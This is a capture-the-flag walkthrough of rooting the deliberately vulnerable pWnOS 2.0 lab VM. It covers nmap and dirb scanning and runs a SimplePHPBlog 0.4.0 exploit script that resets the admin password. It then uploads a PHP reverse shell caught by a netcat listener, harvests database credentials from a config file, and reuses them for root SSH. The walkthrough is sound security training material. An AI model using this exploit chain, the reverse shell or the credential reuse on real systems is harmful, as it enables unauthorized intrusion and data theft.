tl;dr

  • pWnOS:2.0 is a vulnerable VM , where our objective is to gain root access of the machine.
  • blog 0.4.0 - Multiple Remote s exploit.
  • upload reverse shell file to spawn a shell.

Solved by: Jose_v8

It was given that the vulnerable machine has a static IP of 10.10.10.100. And the attacking machine has to be configred within the network range of 10.10.10.0/24 network range.

Initial analysis

The ip of the attacking machine can be set within the specified range by.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~]
└─$ sudo ifconfig eth0 172.16.190.128 down

┌──(kali㉿kali)-[~]
└─$ sudo ifconfig eth0 10.10.10.101 up

┌──(kali㉿kali)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.101 netmask 255.0.0.0 broadcast 10.255.255.255
ether 00:0c:29:35:f2:be txqueuelen 1000 (Ethernet)
RX packets 11375 bytes 13158900 (12.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22649 bytes 1817224 (1.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 164 bytes 12660 (12.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 164 bytes 12660 (12.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

NMAP

Lets do a basic scan using nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 07:43 PDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.10.100
Host is up (0.00024s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds

From this scan we can see that apache service is running on port 80 and ssh is running on port 22.

Now we try to browse to the website hosted .

10.10.10.100 site

Dirb

Now lets do a dirb scan which is a Web content Scanner. It looks for existing hidden objects within the website.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.10.100/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Aug 6 08:52:52 2021
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5898)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5647)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4931)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5289)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Aug 6 08:53:05 2021
DOWNLOADED: 9224 - FOUND: 30

From the dirb scan we could see a directory ‘blog’, lets move in to the directory.
Here we could see the page .
blog page

While inspection of its source code we can find it runs on blog 0.4.0

inspected_code

Exploit

On further searches I could find out that the PHP Blog 0.4.0 -Multiple remote vulnarability. Download the exploit and run the exploit.
exploit_db

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

┌──(kali㉿kali)-[~/Downloads]
└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U user -P password


SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: user
Password is set to: password


*** Exploit Completed....
Have a nice day! :)

This will add the username and password specified by us to the webpage. In this case they are user and password respectively.

From the current webpage we can get to a login page where we will enter the added username and password.
entering_creds

Upload reverse shell

After the submission of credentials the page will be re-directed to a page with upload image option.
cred_re-direct

From the option choose Upload Image and chose the file php-revese-shell.php from the location usr/share/webshells/php
Make necessary changes like the attacker ip and port number for the file.

1
2
3
4
5
6
7

──(kali㉿kali)-[/]
└─$ cd usr/share/webshells/php

┌──(kali㉿kali)-[/usr/share/webshells/php]
└─$ ls
findsocket php-backdoor.php php-reverse-shell.php qsd-php-backdoor.php reverse-shell.php simple-backdoor.php

find_the_reverse-shell.php
upload

Now upload the updated file.

Now use netcat command with the specified port number in the reverse shell file.

1
2
3
4

┌──(kali㉿kali)-[~]
└─$ nc -lvp 1234
listening on [any] 1234 ...

After uploading the file go to the 10.10.10.100/blog/images. And select the uploaded image to get the shell.
select_uploaded_file

Get root access

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~]
└─$ nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Host name lookup failure
connect to [10.10.10.101] from (UNKNOWN) [10.10.10.100] 59470
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
22:06:21 up 3:39, 0 users, load average: 0.00, 0.01, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$

After the shell is obtained we could find a file mysqli_connect.php file in the var directory which has username and password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ cd var
$ ls
backups
cache
crash
index.html
lib
local
lock
log
mail
mysqli_connect.php
opt
run
spool
tmp
uploads
www
$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>$

After getting the credentials we can ssh into the root user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~]
└─$ ssh root@10.10.10.100
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

* Documentation: http://www.ubuntu.com/server/doc

System information as of Fri Jun 11 22:18:23 EDT 2021

System load: 0.0 Processes: 78
Usage of /: 2.9% of 38.64GB Users logged in: 0
Memory usage: 18% IP address for eth0: 10.10.10.100
Swap usage: 0%

Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon Jun 7 15:14:22 2021 from 10.10.10.101
root@web:~#
root@web:~# whoami
root
root@web:~#

Now we are at the root user XD !